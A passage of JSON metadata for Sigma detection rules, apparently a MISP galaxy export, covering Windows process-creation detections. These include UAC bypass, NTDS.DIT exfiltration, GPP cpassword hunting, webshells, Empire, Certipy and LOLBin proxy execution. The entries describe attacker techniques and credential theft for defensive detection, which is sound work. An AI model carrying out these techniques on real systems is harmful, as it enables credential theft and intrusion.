This might be an attempt to bypass UAC", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2018-03-13", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_taskmgr_susp_child_process.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/ReneFreingruber/status/1172244989335810049", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskmgr_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3d7679bd-0c00-440c-97b0-3f204273e6c7", "value": "New Process Created Via Taskmgr.EXE" }, { "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\n", "meta": { "author": "Sreeman", "creation_date": "2020-04-17", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hxtsr_masquerading.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hxtsr_masquerading.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4e762605-34a8-406d-b72e-c1a089313320", "value": "Potential Fake Instance Of Hxtsr.EXE Executed" }, { "description": "Detects the execution of the hacktool SharPersist - used to 
deploy various different kinds of persistence mechanisms", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-09-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharpersist.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/mandiant/SharPersist", "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpersist.yml" ], "tags": [ "attack.persistence", "attack.t1053" ] }, "related": [ { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "26488ad0-f9fd-4536-876f-52fea846a2e4", "value": "HackTool - SharPersist Execution" }, { "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. 
seen in PsExec-like tools", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-11-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_privilege_escalation_cli_patterns.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "50d66fb0-03f8-4da0-8add-84e77d12a020", "value": "Suspicious RunAs-Like Flag Combination" }, { "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_ntds.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", "https://pentestlab.blog/tag/ntds-dit/", "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1", "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://github.com/zcgonvh/NTDSDumpEx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], 
"uuid": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "value": "Suspicious Process Patterns NTDS.DIT Exfil" }, { "description": "Detects addition of users to the local administrator group via \"Net\" or \"Add-LocalGroupMember\".", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-12", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_susp_add_user_local_admin_group.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", "value": "User Added to Local Administrators Group" }, { "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-09-06", "falsepositive": [ "System administrator usage" ], "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml" ], "tags": [ "attack.impact", "attack.t1485" ] }, "related": [ { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "value": "Renamed Sysinternals Sdelete Execution" }, { "description": "Detects potentially suspicious execution of the Qemu utility in a Windows environment.\nThreat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.\n", "meta": { "author": "Muhammad Faisal (@faisalusuf), Hunter Juhan (@threatHNTR)", "creation_date": "2024-06-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_qemu_suspicious_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.qemu.org/docs/master/system/invocation.html#hxtool-5", "https://securelist.com/network-tunneling-with-qemu/111803/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_qemu_suspicious_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1090", "attack.t1572" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5fc297ae-25b6-488a-8f25-cc12ac29b744", "value": "Potentially Suspicious Usage Of Qemu" }, { "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-17", "falsepositive": [ "Rare intended use of hidden services" ], "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "514e4c3a-c77d-4cde-a00f-046425e2301e", "value": "Abuse of Service Permissions to Hide Services Via Set-Service" }, { "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wuauclt_dll_loading.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/", "https://dtm.uk/wuauclt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wuauclt_dll_loading.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.execution" ] }, "related": [ { "dest-uuid": 
"457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "af77cf95-c469-471c-b6a0-946c685c4798", "value": "Proxy Execution Via Wuauclt.EXE" }, { "description": "Detects port forwarding activity via SSH.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-12", "falsepositive": [ "Administrative activity using a remote port forwarding to a local port" ], "filename": "proc_creation_win_ssh_port_forward.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssh_port_forward.yml" ], "tags": [ "attack.command-and-control", "attack.lateral-movement", "attack.t1572", "attack.t1021.001", "attack.t1021.004" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2db31dcd-54da-405d-acef-b9129b816ed6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "327f48c1-a6db-4eb8-875a-f6981f1b0183", "value": "Port Forwarding Activity Via SSH.EXE" }, { "description": "Detects patterns found in process executions caused by China Chopper-like tiny (ASPX) webshells", "meta": { "author": "Florian Roth (Nextron Systems), MSTI (query)", "creation_date": "2022-10-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_webshell_chopper.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_chopper.yml" ], "tags": [ "attack.persistence", "attack.t1505.003", "attack.t1018", "attack.t1033", "attack.t1087" ] }, "related": [ { "dest-uuid": "5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", "value": "Chopper Webshell Process Pattern" }, { "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", "meta": { "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "creation_date": "2021-12-20", "falsepositive": [ "Administrative activity", "Scripts and administrative tools used in the monitored environment", "Monitoring activity" ], "filename": "proc_creation_win_susp_system_user_anomaly.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://tools.thehacker.recipes/mimikatz/modules", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml" ], "tags": [ "attack.credential-access", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1134", "attack.t1003", "attack.t1027" ] }, 
"related": [ { "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "value": "Suspicious SYSTEM User Process Creation" }, { "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n", "meta": { "author": "frack113", "creation_date": "2022-01-07", "falsepositive": [ "WSL (Windows Sub System For Linux)" ], "filename": "proc_creation_win_mstsc_remote_connection.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_remote_connection.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.001" ] }, "related": [ { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "954f0af7-62dd-418f-b3df-a84bc2c7a774", "value": "New Remote Desktop Connection Initiated Via Mstsc.EXE" }, { "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible 
whitelisting", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-01", "falsepositive": [ "Legitimate use when App-v is deployed" ], "filename": "proc_creation_win_lolbin_scriptrunner.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "64760eef-87f7-4ed3-93fd-655668ea9420", "value": "Use of Scriptrunner.exe" }, { "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", "meta": { "author": "David Burkett, @signalblur", "creation_date": "2019-12-28", "falsepositive": [ "Rpcnet.exe / rpcnetp.exe which is a lojack style software. 
https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20180718061628/https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "16c37b52-b141-42a5-a3ea-bbe098444397", "value": "Suspect Svchost Activity" }, { "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-18", "falsepositive": [ "Likelihood is related to how often the paths are used in the environment" ], "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/", "https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e22722b-dfb1-4508-a911-49ac840b40f8", 
"value": "Suspicious Mstsc.EXE Execution With Local RDP File" }, { "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", "meta": { "author": "Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel", "creation_date": "2019-01-29", "falsepositive": [ "Legitimate administration activity", "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" ], "filename": "proc_creation_win_netsh_port_forwarding.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", "https://www.dfirnotes.net/portproxy_detection/", "https://adepts.of0x.cc/netsh-portproxy-code/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_forwarding.yml" ], "tags": [ "attack.lateral-movement", "attack.defense-evasion", "attack.command-and-control", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", "value": "New Port Forwarding Rule Added Via Netsh.EXE" }, { "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-03-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_inline_vbs.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_inline_vbs.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", "value": "Suspicious Rundll32 Invoking Inline VBScript" }, { "description": "Detects remote PowerShell sessions by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-09-12", "falsepositive": [ "Legitimate usage of remote Powershell, e.g. for monitoring purposes." ], "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.t1021.006" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", "value": "Remote PowerShell Session Host Process (WinRM)" }, { "description": "Detects suspicious powershell command line parameters used in Empire", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-04-20", "falsepositive": [ "Other tools that incidentally use the same command line 
parameters" ], "filename": "proc_creation_win_hktl_empire_powershell_launch.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "value": "HackTool - Empire PowerShell Launch Parameters" }, { "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-05-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml" ], "tags": [ "attack.initial-access", "attack.t1190", 
"attack.lateral-movement", "attack.t1210", "car.2013-07-002" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1012f107-b8f1-4271-af30-5aed2de89b39", "value": "Terminal Service Process Spawn" }, { "description": "Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.\n", "meta": { "author": "pH-T (Nextron Systems), Sittikorn Sangrattanapitak", "creation_date": "2023-04-17", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_certipy.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/ly4k/Certipy", "https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_certipy.yml" ], "tags": [ "attack.discovery", "attack.credential-access", "attack.t1649" ] }, "related": [ { "dest-uuid": "7de1f7ac-5d0c-4c9c-8873-627202205331", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6938366d-8954-4ddc-baff-c830b3ba8fcd", "value": "HackTool - Certipy Execution" }, { "description": "Detects a suspicious UltraVNC command line flag combination that indicates an auto reconnect upon execution, e.g. 
startup (as seen being used by Gamaredon threat group)", "meta": { "author": "Bhabesh Raj", "creation_date": "2022-03-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_ultravnc_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine", "https://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html", "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", "https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc_susp_execution.yml" ], "tags": [ "attack.lateral-movement", "attack.g0047", "attack.t1021.005" ] }, "related": [ { "dest-uuid": "01327cde-66c4-4123-bf34-5f258d59457b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "871b9555-69ca-4993-99d3-35a59f9f3599", "value": "Suspicious UltraVNC Execution" }, { "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", "meta": { "author": "frack113", "creation_date": "2022-12-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_unregmp2.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], 
"uuid": "727454c0-d851-48b0-8b89-385611ab0704", "value": "Lolbin Unregmp2.exe Use As Proxy" }, { "description": "Detects execution of the \"cloudflared\" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.", "meta": { "author": "Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-17", "falsepositive": [ "Legitimate usage of Cloudflared tunnel." ], "filename": "proc_creation_win_cloudflared_tunnel_run.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/cloudflare/cloudflared", "https://developers.cloudflare.com/cloudflare-one/connections/connect-apps", "https://blog.reconinfosec.com/emergence-of-akira-ransomware-group", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_run.yml" ], "tags": [ "attack.command-and-control", "attack.t1102", "attack.t1090", "attack.t1572" ] }, "related": [ { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9a019ffc-3580-4c9d-8d87-079f7e8d3fd4", "value": "Cloudflared Tunnel Execution" }, { "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. 
This value can be decrypted with gpp-decrypt.", "meta": { "author": "frack113", "creation_date": "2021-12-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_findstr_gpp_passwords.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml" ], "tags": [ "attack.credential-access", "attack.t1552.006" ] }, "related": [ { "dest-uuid": "8d7bd4f5-3a89-4453-9c82-2c8894d5655e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "value": "Findstr GPP Passwords" }, { "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-08-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", 